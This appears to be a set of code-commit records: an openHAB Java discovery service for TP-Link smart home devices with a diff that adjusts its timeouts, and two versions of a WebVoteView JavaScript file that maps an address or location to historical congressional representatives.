*/ private void closeDiscoverSocket() { if (discoverSocket != null) { discoverSocket.close(); discoverSocket = null; } } /** * Detected a device (thing) and get process the data from the device and report it discovered. * * @param packet containing data of detected device * @throws IOException in case decrypting of the data failed */ private void detectThing(DatagramPacket packet) throws IOException { String ipAddress = packet.getAddress().getHostAddress(); String rawData = CryptUtil.decrypt(packet.getData(), packet.getLength()); Sysinfo sysinfoRaw = commands.getSysinfoReponse(rawData); Sysinfo sysinfo = sysinfoRaw.getActualSysinfo(); logger.trace("Detected TP-Link Smart Home device: {}", rawData); String deviceId = sysinfo.getDeviceId(); logger.debug("TP-Link Smart Home device '{}' with id {} found on {} ", sysinfo.getAlias(), deviceId, ipAddress); idInetAddressCache.put(deviceId, ipAddress); Optional<ThingTypeUID> thingTypeUID = getThingTypeUID(sysinfo.getModel()); if (thingTypeUID.isPresent()) { ThingUID thingUID = new ThingUID(thingTypeUID.get(), deviceId.substring(deviceId.length() - 6, deviceId.length())); Map<String, Object> properties = PropertiesCollector.collectProperties(thingTypeUID.get(), ipAddress, sysinfoRaw); DiscoveryResult discoveryResult = DiscoveryResultBuilder.create(thingUID).withLabel(sysinfo.getAlias()) .withRepresentationProperty(deviceId).withProperties(properties).build(); thingDiscovered(discoveryResult); } else { logger.debug("Detected, but ignoring unsupported TP-Link Smart Home device model '{}'", sysinfo.getModel()); } } /** * Finds the {@link ThingTypeUID} based on the model value returned by the device. * * @param model model value returned by the device * @return {@link ThingTypeUID} or null if device not recognized */ private Optional<ThingTypeUID> getThingTypeUID(String model) { String modelLC = model.toLowerCase(Locale.ENGLISH); return SUPPORTED_THING_TYPES.stream().filter(suid -> modelLC.startsWith(suid.getId())).findFirst(); } }
addons/binding/org.openhab.binding.tplinksmarthome/src/main/java/org/openhab/binding/tplinksmarthome/internal/TPLinkSmartHomeDiscoveryService.java
/** * Copyright (c) 2010-2018 by the respective copyright holders. * * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html */ package org.openhab.binding.tplinksmarthome.internal; import static org.openhab.binding.tplinksmarthome.internal.TPLinkSmartHomeThingType.SUPPORTED_THING_TYPES; import java.io.IOException; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.InetAddress; import java.net.SocketTimeoutException; import java.net.UnknownHostException; import java.util.Locale; import java.util.Map; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; import org.eclipse.jdt.annotation.NonNullByDefault; import org.eclipse.jdt.annotation.Nullable; import org.eclipse.smarthome.config.discovery.AbstractDiscoveryService; import org.eclipse.smarthome.config.discovery.DiscoveryResult; import org.eclipse.smarthome.config.discovery.DiscoveryResultBuilder; import org.eclipse.smarthome.config.discovery.DiscoveryService; import org.eclipse.smarthome.core.thing.ThingTypeUID; import org.eclipse.smarthome.core.thing.ThingUID; import org.openhab.binding.tplinksmarthome.internal.model.Sysinfo; import org.osgi.service.component.annotations.Component; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * The {@link TPLinkSmartHomeDiscoveryService} detects new Smart Home Bulbs, Plugs and Switches by sending a UDP network * broadcast and parsing the answer into a thing. * * @author Christian Fischer - Initial contribution * @author Hilbrand Bouwkamp - Complete make-over, reorganized code and code cleanup. 
*/ @Component(service = { DiscoveryService.class, TPLinkIpAddressService.class }, immediate = true, configurationPid = "discovery.tplinksmarthome") @NonNullByDefault public class TPLinkSmartHomeDiscoveryService extends AbstractDiscoveryService implements TPLinkIpAddressService { private static final String BROADCAST_IP = "255.255.255.255"; private static final int DISCOVERY_TIMEOUT_SECONDS = 30; private static final int UDP_PACKET_TIMEOUT_MS = 3000; private static final long REFRESH_INTERVAL_MINUTES = 1; private final Logger logger = LoggerFactory.getLogger(TPLinkSmartHomeDiscoveryService.class); private final Commands commands = new Commands(); private final Map<String, String> idInetAddressCache = new ConcurrentHashMap<>(); private final DatagramPacket discoverPacket; private final byte[] buffer = new byte[2048]; private @NonNullByDefault({}) DatagramSocket discoverSocket; private @NonNullByDefault({}) ScheduledFuture<?> discoveryJob; public TPLinkSmartHomeDiscoveryService() throws UnknownHostException { super(SUPPORTED_THING_TYPES, DISCOVERY_TIMEOUT_SECONDS); InetAddress broadcast = InetAddress.getByName(BROADCAST_IP); byte[] discoverbuffer = CryptUtil.encrypt(Commands.getSysinfo()); discoverPacket = new DatagramPacket(discoverbuffer, discoverbuffer.length, broadcast, Connection.TP_LINK_SMART_HOME_PORT); } @Override public @Nullable String getLastKnownIpAddress(String deviceId) { return idInetAddressCache.get(deviceId); } @Override protected void startBackgroundDiscovery() { discoveryJob = scheduler.scheduleWithFixedDelay(this::startScan, 0, REFRESH_INTERVAL_MINUTES, TimeUnit.MINUTES); } @Override protected void stopBackgroundDiscovery() { stopScan(); if (discoveryJob != null && !discoveryJob.isCancelled()) { discoveryJob.cancel(true); discoveryJob = null; } } @Override protected void startScan() { logger.debug("Start scan for TP-Link Smart devices."); synchronized (this) { try { discoverSocket = sendDiscoveryPacket(); // Runs until the socket call gets a time out and throws an exception. When a time out is triggered it // means no data was present and nothing new to discover. while (true) { if (discoverSocket == null) { break; } DatagramPacket packet = new DatagramPacket(buffer, buffer.length); discoverSocket.receive(packet); logger.debug("TP-Link Smart device discovery returned package with length {}", packet.getLength()); if (packet.getLength() > 0) { detectThing(packet); } } } catch (SocketTimeoutException e) { logger.debug("Discovering poller timeout..."); } catch (IOException e) { logger.debug("Error during discovery: {}", e.getMessage()); } finally { closeDiscoverSocket(); removeOlderResults(getTimestampOfLastScan()); } } } @Override protected void stopScan() { logger.debug("Stop scan for TP-Link Smart devices."); closeDiscoverSocket(); super.stopScan(); } /** * Opens a {@link DatagramSocket} and sends a packet for discovery of TP-Link Smart Home devices. * * @return Returns the new socket * @throws IOException exception in case sending the packet failed */ protected DatagramSocket sendDiscoveryPacket() throws IOException { DatagramSocket ds = new DatagramSocket(null); ds.setBroadcast(true); ds.setSoTimeout(UDP_PACKET_TIMEOUT_MS); ds.send(discoverPacket); logger.trace("Discovery package sent."); return ds; } /** * Closes the discovery socket and cleans the value. No need for synchronization as this method is called from a * synchronized context. 
*/ private void closeDiscoverSocket() { if (discoverSocket != null) { discoverSocket.close(); discoverSocket = null; } } /** * Detected a device (thing) and get process the data from the device and report it discovered. * * @param packet containing data of detected device * @throws IOException in case decrypting of the data failed */ private void detectThing(DatagramPacket packet) throws IOException { String ipAddress = packet.getAddress().getHostAddress(); String rawData = CryptUtil.decrypt(packet.getData(), packet.getLength()); Sysinfo sysinfoRaw = commands.getSysinfoReponse(rawData); Sysinfo sysinfo = sysinfoRaw.getActualSysinfo(); logger.trace("Detected TP-Link Smart Home device: {}", rawData); String deviceId = sysinfo.getDeviceId(); logger.debug("TP-Link Smart Home device '{}' with id {} found on {} ", sysinfo.getAlias(), deviceId, ipAddress); idInetAddressCache.put(deviceId, ipAddress); Optional<ThingTypeUID> thingTypeUID = getThingTypeUID(sysinfo.getModel()); if (thingTypeUID.isPresent()) { ThingUID thingUID = new ThingUID(thingTypeUID.get(), deviceId.substring(deviceId.length() - 6, deviceId.length())); Map<String, Object> properties = PropertiesCollector.collectProperties(thingTypeUID.get(), ipAddress, sysinfoRaw); DiscoveryResult discoveryResult = DiscoveryResultBuilder.create(thingUID).withLabel(sysinfo.getAlias()) .withRepresentationProperty(deviceId).withProperties(properties).build(); thingDiscovered(discoveryResult); } else { logger.debug("Detected, but ignoring unsupported TP-Link Smart Home device model '{}'", sysinfo.getModel()); } } /** * Finds the {@link ThingTypeUID} based on the model value returned by the device. * * @param model model value returned by the device * @return {@link ThingTypeUID} or null if device not recognized */ private Optional<ThingTypeUID> getThingTypeUID(String model) { String modelLC = model.toLowerCase(Locale.ENGLISH); return SUPPORTED_THING_TYPES.stream().filter(suid -> modelLC.startsWith(suid.getId())).findFirst(); } }
Discovery package timeout gets more time and the cache is cleared before discovery starts. (#4255) The packet timeout of discovery was very short; for devices with a low connection RSSI this seems to give them some more time to react. Also reduced the overall discovery time, because once the packet timeout triggers, discovery is over anyway, so there is no need to keep it open longer. Also cleared the idInetAddressCache before each scan to avoid stale results and keep the cache clean. Signed-off-by: Hilbrand Bouwkamp <[email protected]>
addons/binding/org.openhab.binding.tplinksmarthome/src/main/java/org/openhab/binding/tplinksmarthome/internal/TPLinkSmartHomeDiscoveryService.java
Discovery package timeout gets more time and the cache is cleared before discovery starts. (#4255)
<ide><path>ddons/binding/org.openhab.binding.tplinksmarthome/src/main/java/org/openhab/binding/tplinksmarthome/internal/TPLinkSmartHomeDiscoveryService.java <ide> public class TPLinkSmartHomeDiscoveryService extends AbstractDiscoveryService implements TPLinkIpAddressService { <ide> <ide> private static final String BROADCAST_IP = "255.255.255.255"; <del> private static final int DISCOVERY_TIMEOUT_SECONDS = 30; <del> private static final int UDP_PACKET_TIMEOUT_MS = 3000; <add> private static final int DISCOVERY_TIMEOUT_SECONDS = 8; <add> private static final int UDP_PACKET_TIMEOUT_MS = (int) TimeUnit.SECONDS.toMillis(DISCOVERY_TIMEOUT_SECONDS - 1); <ide> private static final long REFRESH_INTERVAL_MINUTES = 1; <ide> <ide> private final Logger logger = LoggerFactory.getLogger(TPLinkSmartHomeDiscoveryService.class); <ide> logger.debug("Start scan for TP-Link Smart devices."); <ide> synchronized (this) { <ide> try { <add> idInetAddressCache.clear(); <ide> discoverSocket = sendDiscoveryPacket(); <ide> // Runs until the socket call gets a time out and throws an exception. When a time out is triggered it <ide> // means no data was present and nothing new to discover.
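The diff above ties the UDP receive timeout to the discovery window instead of using an unrelated constant. The fragment below is a minimal sketch that isolates just that arithmetic (7000 ms of socket wait inside an 8-second scan slot); it is not part of the binding itself.

import java.util.concurrent.TimeUnit;

// Sketch of the timing relationship introduced above: the blocking UDP
// receive() timeout is derived from the discovery window so it gives up one
// second before the scan itself ends.
public class DiscoveryTimeoutSketch {
    private static final int DISCOVERY_TIMEOUT_SECONDS = 8;
    private static final int UDP_PACKET_TIMEOUT_MS =
            (int) TimeUnit.SECONDS.toMillis(DISCOVERY_TIMEOUT_SECONDS - 1);

    public static void main(String[] args) {
        System.out.println("scan window : " + DISCOVERY_TIMEOUT_SECONDS + " s");
        System.out.println("udp timeout : " + UDP_PACKET_TIMEOUT_MS + " ms"); // 7000
    }
}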
JavaScript
apache-2.0
90ace3841cb3a63312ed07322683d1fadaa24dac
0
JeffreyBLewis/WebVoteView,JeffreyBLewis/WebVoteView,JeffreyBLewis/WebVoteView,JeffreyBLewis/WebVoteView
var tooltipIdeology = $("<div></div>").addClass("d3-tip").css("visibility","hidden").attr("id","tooltipIdeology").appendTo(document.body); // From stackoverflow response, who borrowed it from Shopify--simple ordinal suffix. var myLat, myLong; var slowTimer; var globalEnableLocation = 0; function getGetOrdinal(n) { var s=["th","st","nd","rd"], v=n%100; return n+(s[(v-20)%10]||s[v]||s[0]); } function congToYears(n) { return [1787+(2*n), 1787+(2*n)+2]; } function lzPad(t) { if(parseInt(t)<10) { return "0"+t; } else { return t; } } function loadText(t) { $("#addressInput").val(t); latLongWrapper(); } function resetResults() { $("#resultsMembers").hide().html(""); $("#addressCorrected").html(""); $("#google_map").html(""); $("#warnings").hide().html(""); $("#loadProgress").hide().html(""); $("#perm_link_holder").html(""); } $(document).ready(function(){ $("#addressInput").on("focus",function() { if($("#addressInput").val()=="MY LOCATION") { $("#addressInput").val(""); } }); $("#submit-address-form").submit(function(event) { event.preventDefault(); latLongWrapper(); }); $("#submit-geolocation").click(function(event) { event.preventDefault(); getLocation(); }); if($("#cachedLat").val()) { myLat = $("#cachedLat").val(); } if($("#cachedLong").val()) { myLong = $("#cachedLong").val(); } if($("#addressInput").val()) { setTimeout(function(){latLongWrapper();},1000); } $("ul#testData li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); $("ul#notableExamples li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); }); if(navigator.geolocation) { globalEnableLocation=1; console.log('html5 location support.'); $("#locationButton").show(); function success(position) { clearTimeout(slowTimer); console.log(position.coords); myLat = position.coords.latitude; myLong = position.coords.longitude; $("#cachedLat").val(myLat); $("#cachedLong").val(myLong); $("#addressInput").val("MY LOCATION"); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Location matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(myLat, myLong); } function error() { clearTimeout(slowTimer); resetResults(); $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error looking up your location. Most commonly this occurs because you are having internet connection trouble or you have privacy settings designed to block web access to your location."); errorDiv.appendTo($("#warnings")); return; } function getLocation(event) { console.log(event); console.log('I AM HERE, IN THE GETLOCATION FUNCTION'); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Looking up your current location... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); slowTimer = setTimeout(function() { $("#loadProgress").html($("#loadProgress").html()+"<br/>This process seems to be taking an unusually long time to complete. 
The delay is related to your internet connection, router, or web browser and is not connected to our server."); }, 5000); navigator.geolocation.getCurrentPosition(success, error); } $("#geolocationTutorial").show(); } function latLongWrapper() { console.log('I AM HERE, IN THE ADDRESS LOOKUP.'); resetResults(); if($("#addressInput").val()=="") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> No address specified."); errorDiv.appendTo($("#warnings")); return; } else if($("#addressInput").val()=="MY LOCATION" && globalEnableLocation && $("#cachedLat").val() && $("#cachedLong").val()) { doMembers(parseFloat($("#cachedLat").val()), parseFloat($("#cachedLong").val())); } else if($("#addressInput").val()=="MY LOCATION") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error accessing your location, either due to internet connectivity or privacy settings. Please manually type an address to continue."); errorDiv.appendTo($("#warnings")); } else { $("#loadProgress").show().html("<strong>Loading...</strong> Matching address to map coordinates... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); setTimeout(doLatLong, 20); } } function doLatLong() { console.log('I AM HERE, CACHED LAT LONG TO DISTRICT LOOKUP.'); $.ajax({ dataType: "JSON", url: "/api/geocode?q="+$("#addressInput").val(), success: function(data, status, xhr) { console.log(data); if(data["status"]) { $("#loadProgress").fadeOut(); console.log("Error! Oh no!"); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> "+data["error_message"]) errorDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); return; } else { console.log(data); if(data["warnings"]!=undefined && data["warnings"].length) { $("#warnings").html(""); var warningDiv = $("<div></div>").addClass("alert alert-warning").html("<strong>Warning:</strong> "+data["warnings"][0]); warningDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); } $("#addressCorrected").html("<strong>Address Lookup:</strong><br/><small>"+data["formatted_address"]+"</small>"); $("#loadProgress").html("<strong>Loading...</strong> Address matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(data["lat"], data["lng"]); } } }); } function compareSort(a, b) { if(a.congress > b.congress) { return -1; } else if(a.congress < b.congress) { return 1; } else { if(a.party_noun < b.party_noun) { return -1; } else if(a.party_noun > b.party_noun) { return 1; } else { if(a.bioname < b.bioname) { return -1; } else { return 1; } } } } function doMembers(lat, lng) { console.log("Entering this now."); console.log(lat); console.log(lng); var markerPos = {lat: lat, lng: lng}; var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); // Put the marker in the lat/long var marker = new google.maps.Marker({position: markerPos, map: map}); // If the user moves the viewport, update the map? 
google.maps.event.addListener(map, 'idle', function() { console.log("idle now"); var coords = [map.getCenter().lat(), map.getCenter().lng()]; //$("#addressInput").val(coords[0]+", "+coords[1]); //resetResults(); //doLatLong(); }); $.ajax({ dataType: "JSON", url: "/api/districtLookup?lat="+lat+"&long="+lng, success: function(data, status, xhr) { $("#loadProgress").fadeOut(); if(data["resCurr"].length) { $("<h4>Current Congressperson and Senators</h4>").appendTo("#resultsMembers"); var memberList = $("<ul></ul>").css("columns","auto 3") .css("list-style-type","none").css("overflow","auto") .css("width","100%").css("margin-left",0).css("padding-left",0).css("margin-bottom","15px") .css("display","block").attr("id","memberList"); console.log(data["resCurr"]); memberList.appendTo("#resultsMembers"); $.each(data["resCurr"], function(k,v) { constructPlot(v, 0); }); } var permLink = $("<a></a>").attr("href","/district/"+encodeURI($("#addressInput").val())).html("Permanent Link to this address search."); permLink.appendTo($("#perm_link_holder")); $("<h4>Historical Representatives</h4>").appendTo("#resultsMembers"); var table = $("<table><thead><tr><th>Congress</th><th>District</th><th>Ideology</th><th>Party</th><th>Member</th></tr></thead></table>") .addClass("table table-hover dc-data-table"); var tbody = $("<tbody></tbody>"); // For visual design, we do a pocket algorithm; save the last guy, compare to current guy, see what's changed. var lastResult = {}; var myResults = data["results"].sort(compareSort); $.each(myResults, function(k, v) { // Check to see if we have other members at the same time var multiMember=0; if(v["congress"]<90) { var howMany = $.grep(myResults, function(n,i) { return (n["congress"]==v["congress"]); }); if(howMany.length>1) { multiMember=1; } } // Explainers for weird edge cases (partition/joining or the Civil War) if(lastResult["congress"]>38 && lastResult["congress"]<=45 && v["congress"]<37 && v["congress"]>=30) { var civilWarDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: "+v["state"]+" does not seat a delegation in the US Congress."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); civilWarDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maryland" && Math.abs(v["congress"]-lastResult["congress"])>20) { var maryDiv = $("<div></div>").addClass("alert alert-info").html("<strong>D.C.</strong>: The changing shapes of congressional districts occasionally include the address you entered in Maryland. As above, Voteview.com does not track D.C. 
delegates."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maryDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="West Virginia" && v["state"]=="Virginia") { var virgDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: West Virginia breaks away from Virginia to form a new state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); virgDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maine" && v["state"]=="Massachusetts") { var maineDiv = $("<div></div>").addClass("alert alert-info").html("<strong>1820</strong>: Maine votes to secede from Massachusetts and is admitted to the union as a state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maineDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } var tr = $("<tr></tr>").on("click",function(){window.location='/person/'+v["icpsr"]+"/"+v["seo_name"];}); dateSet = congToYears(v["congress"]); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomOffset = Math.floor((v["nominate"]["dim1"]+1.01)*50); } $("<td>"+getGetOrdinal(v["congress"])+" ("+dateSet[0]+"-"+dateSet[1].toString().substr(2,2)+")</td>").appendTo(tr); $("<td>"+v["state_abbrev"]+"-"+lzPad(v["district_code"])+"</td>").appendTo(tr); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomDiv = $("<span></span>").css("border-right","3px solid "+colorSchemes[v["party_color"]][0]) .css("width",nomOffset+"%").css("height","100%").css("overflow","auto").css("display","block"); var holdingTD = $("<td></td>").css("padding","0").css("width","20px").css("border-left","1px solid grey").css("border-right","1px solid grey"); nomDiv.appendTo(holdingTD); holdingTD.appendTo(tr); } else { $("<td></td>").appendTo(tr); } $("<td>"+v["party_noun"]+"</td>").appendTo(tr); $("<td><a href=\"/person/"+v["icpsr"]+"/"+v["seo_name"]+"\">"+v["bioname"]+"</a></td>").appendTo(tr); // Use a closure to pin tooltips onto each row. (function(v){ tr.on("mouseover", function() { $("#tooltipIdeology").html(""); if(v["nominate"]!=undefined) { $("#tooltipIdeology").html(v["nominate"]["dim1"]); } else { $("#tooltipIdeology").html("<strong>No Ideology Score</strong>"); } $("#tooltipIdeology").removeClass().addClass("d3-tip"); $("#tooltipIdeology").css("left",($(this).offset().left+245)+"px"); $("#tooltipIdeology").css("top",$(this).offset().top+"px"); $("#tooltipIdeology").css("visibility","visible"); }); tr.on("mouseout",function() { $("#tooltipIdeology").css("visibility","hidden"); }); })(v); tr.appendTo(tbody); lastResult = v; }); tbody.appendTo(table); table.appendTo($("#resultsMembers")); //permLink.appendTo($("#resultsMembers")); $("#resultsMembers").fadeIn(); } }); }
static/js/district.js
var tooltipIdeology = $("<div></div>").addClass("d3-tip").css("visibility","hidden").attr("id","tooltipIdeology").appendTo(document.body); // From stackoverflow response, who borrowed it from Shopify--simple ordinal suffix. var myLat, myLong; var slowTimer; var globalEnableLocation = 0; function getGetOrdinal(n) { var s=["th","st","nd","rd"], v=n%100; return n+(s[(v-20)%10]||s[v]||s[0]); } function congToYears(n) { return [1787+(2*n), 1787+(2*n)+2]; } function lzPad(t) { if(parseInt(t)<10) { return "0"+t; } else { return t; } } function loadText(t) { $("#addressInput").val(t); latLongWrapper(); } function resetResults() { $("#resultsMembers").hide().html(""); $("#addressCorrected").html(""); $("#google_map").html(""); $("#warnings").hide().html(""); $("#loadProgress").hide().html(""); $("#perm_link_holder").html(""); } $(document).ready(function(){ $("#addressInput").on("focus",function() { if($("#addressInput").val()=="MY LOCATION") { $("#addressInput").val(""); } }); $("#submit-address-form").submit(function(event) { event.preventDefault(); latLongWrapper(); }); $("#submit-geolocation").click(function(event) { event.preventDefault(); getLocation(); }); if($("#cachedLat").val()) { myLat = $("#cachedLat").val(); } if($("#cachedLong").val()) { myLong = $("#cachedLong").val(); } if($("#addressInput").val()) { setTimeout(function(){latLongWrapper();},1000); } $("ul#testData li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); $("ul#notableExamples li").on("click",function(){ console.log($(this).val()); loadText(this.innerHTML); }); }); if(navigator.geolocation) { globalEnableLocation=1; console.log('html5 location support.'); $("#locationButton").show(); function success(position) { clearTimeout(slowTimer); console.log(position.coords); myLat = position.coords.latitude; myLong = position.coords.longitude; $("#cachedLat").val(myLat); $("#cachedLong").val(myLong); $("#addressInput").val("MY LOCATION"); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Location matched, looking up historical representatives... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(myLat, myLong); } function error() { clearTimeout(slowTimer); resetResults(); $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error looking up your location. Most commonly this occurs because you are having internet connection trouble or you have privacy settings designed to block web access to your location."); errorDiv.appendTo($("#warnings")); return; } function getLocation(event) { console.log(event); console.log('I AM HERE, IN THE GETLOCATION FUNCTION'); resetResults(); $("#loadProgress").show().html("<strong>Loading...</strong> Looking up your current location... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); slowTimer = setTimeout(function() { $("#loadProgress").html($("#loadProgress").html()+"<br/>This process seems to be taking an unusually long time to complete. 
The delay is related to your internet connection, router, or web browser and is not connected to our server."); }, 5000); navigator.geolocation.getCurrentPosition(success, error); } $("#geolocationTutorial").show(); } function latLongWrapper() { console.log('I AM HERE, IN THE ADDRESS LOOKUP.'); resetResults(); if($("#addressInput").val()=="") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> No address specified."); errorDiv.appendTo($("#warnings")); return; } else if($("#addressInput").val()=="MY LOCATION" && globalEnableLocation && $("#cachedLat").val() && $("#cachedLong").val()) { doMembers(parseFloat($("#cachedLat").val()), parseFloat($("#cachedLong").val())); } else if($("#addressInput").val()=="MY LOCATION") { $("#warnings").html("").show(); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> Error accessing your location, either due to internet connectivity or privacy settings. Please manually type an address to continue."); errorDiv.appendTo($("#warnings")); } else { $("#loadProgress").show().html("<strong>Loading...</strong> Matching address to map coordinates... <img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); setTimeout(doLatLong, 20); } } function doLatLong() { console.log('I AM HERE, CACHED LAT LONG TO DISTRICT LOOKUP.'); $.ajax({ dataType: "JSON", url: "/api/geocode?q="+$("#addressInput").val(), success: function(data, status, xhr) { console.log(data); if(data["status"]) { $("#loadProgress").fadeOut(); console.log("Error! Oh no!"); var errorDiv = $("<div></div>").addClass("alert alert-danger").html("<strong>Error:</strong> "+data["error_message"]) errorDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); return; } else { console.log(data); if(data["warnings"]!=undefined && data["warnings"].length) { $("#warnings").html(""); var warningDiv = $("<div></div>").addClass("alert alert-warning").html("<strong>Warning:</strong> "+data["warnings"][0]); warningDiv.appendTo($("#warnings")); $("#warnings").fadeIn(); } $("#addressCorrected").html("<strong>Address Lookup:</strong><br/><small>"+data["formatted_address"]+"</small>"); $("#loadProgress").html("<strong>Loading...</strong> Address matched, looking up historical representatives... 
<img src=\"/static/img/loading.gif\" style=\"width:16px;\">"); doMembers(data["lat"], data["lng"]); } } }); } function compareSort(a, b) { if(a.congress > b.congress) { return -1; } else if(a.congress < b.congress) { return 1; } else { if(a.party_noun < b.party_noun) { return -1; } else if(a.party_noun > b.party_noun) { return 1; } else { if(a.bioname < b.bioname) { return -1; } else { return 1; } } } } function doMembers(lat, lng) { console.log("Entering this now."); console.log(lat); console.log(lng); var markerPos = {lat: lat, lng: lng}; var map = new google.maps.Map(document.getElementById("google_map"), {zoom: 12, center: markerPos, disableDefaultUI: true, scrollwheel: false, draggable: true, zoomControl: true}); var market = new google.maps.Marker({position: markerPos, map: map}); $.ajax({ dataType: "JSON", url: "/api/districtLookup?lat="+lat+"&long="+lng, success: function(data, status, xhr) { $("#loadProgress").fadeOut(); if(data["resCurr"].length) { $("<h4>Current Congressperson and Senators</h4>").appendTo("#resultsMembers"); var memberList = $("<ul></ul>").css("columns","auto 3") .css("list-style-type","none").css("overflow","auto") .css("width","100%").css("margin-left",0).css("padding-left",0).css("margin-bottom","15px") .css("display","block").attr("id","memberList"); console.log(data["resCurr"]); memberList.appendTo("#resultsMembers"); $.each(data["resCurr"], function(k,v) { constructPlot(v, 0); }); } var permLink = $("<a></a>").attr("href","/district/"+encodeURI($("#addressInput").val())).html("Permanent Link to this address search."); permLink.appendTo($("#perm_link_holder")); $("<h4>Historical Representatives</h4>").appendTo("#resultsMembers"); var table = $("<table><thead><tr><th>Congress</th><th>District</th><th>Ideology</th><th>Party</th><th>Member</th></tr></thead></table>") .addClass("table table-hover dc-data-table"); var tbody = $("<tbody></tbody>"); // For visual design, we do a pocket algorithm; save the last guy, compare to current guy, see what's changed. var lastResult = {}; var myResults = data["results"].sort(compareSort); $.each(myResults, function(k, v) { // Check to see if we have other members at the same time var multiMember=0; if(v["congress"]<90) { var howMany = $.grep(myResults, function(n,i) { return (n["congress"]==v["congress"]); }); if(howMany.length>1) { multiMember=1; } } // Explainers for weird edge cases (partition/joining or the Civil War) if(lastResult["congress"]>38 && lastResult["congress"]<=45 && v["congress"]<37 && v["congress"]>=30) { var civilWarDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: "+v["state"]+" does not seat a delegation in the US Congress."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); civilWarDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maryland" && Math.abs(v["congress"]-lastResult["congress"])>20) { var maryDiv = $("<div></div>").addClass("alert alert-info").html("<strong>D.C.</strong>: The changing shapes of congressional districts occasionally include the address you entered in Maryland. As above, Voteview.com does not track D.C. 
delegates."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maryDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="West Virginia" && v["state"]=="Virginia") { var virgDiv = $("<div></div>").addClass("alert alert-info").html("<strong>United States Civil War</strong>: West Virginia breaks away from Virginia to form a new state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); virgDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } if(lastResult["state"]=="Maine" && v["state"]=="Massachusetts") { var maineDiv = $("<div></div>").addClass("alert alert-info").html("<strong>1820</strong>: Maine votes to secede from Massachusetts and is admitted to the union as a state."); var tr = $("<tr></tr>"); var td = $("<td colspan=\"5\"></td>"); maineDiv.appendTo(td); td.appendTo(tr); tr.appendTo(tbody); } var tr = $("<tr></tr>").on("click",function(){window.location='/person/'+v["icpsr"]+"/"+v["seo_name"];}); dateSet = congToYears(v["congress"]); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomOffset = Math.floor((v["nominate"]["dim1"]+1.01)*50); } $("<td>"+getGetOrdinal(v["congress"])+" ("+dateSet[0]+"-"+dateSet[1].toString().substr(2,2)+")</td>").appendTo(tr); $("<td>"+v["state_abbrev"]+"-"+lzPad(v["district_code"])+"</td>").appendTo(tr); if(v["nominate"]!=undefined && v["nominate"]["dim1"]!=undefined) { var nomDiv = $("<span></span>").css("border-right","3px solid "+colorSchemes[v["party_color"]][0]) .css("width",nomOffset+"%").css("height","100%").css("overflow","auto").css("display","block"); var holdingTD = $("<td></td>").css("padding","0").css("width","20px").css("border-left","1px solid grey").css("border-right","1px solid grey"); nomDiv.appendTo(holdingTD); holdingTD.appendTo(tr); } else { $("<td></td>").appendTo(tr); } $("<td>"+v["party_noun"]+"</td>").appendTo(tr); $("<td><a href=\"/person/"+v["icpsr"]+"/"+v["seo_name"]+"\">"+v["bioname"]+"</a></td>").appendTo(tr); // Use a closure to 